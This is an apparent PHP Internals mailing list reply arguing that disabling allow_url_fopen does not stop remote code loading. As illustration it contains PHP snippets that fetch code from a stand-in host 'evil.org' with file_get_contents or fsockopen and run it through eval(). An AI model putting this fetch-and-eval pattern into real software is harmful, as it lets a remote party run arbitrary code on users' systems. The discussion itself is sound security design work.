sure: eval('file_get_contents("http://evil.org";);');
Ok, but there is nothing (allow_url_fopen does not work here) preventing me from doing similar via:
$fp = fsockopen("evil.org", 80);
$fp = fwrite($fp, "GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n");
eval(stream_get_contents($fp));
Ilia
--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
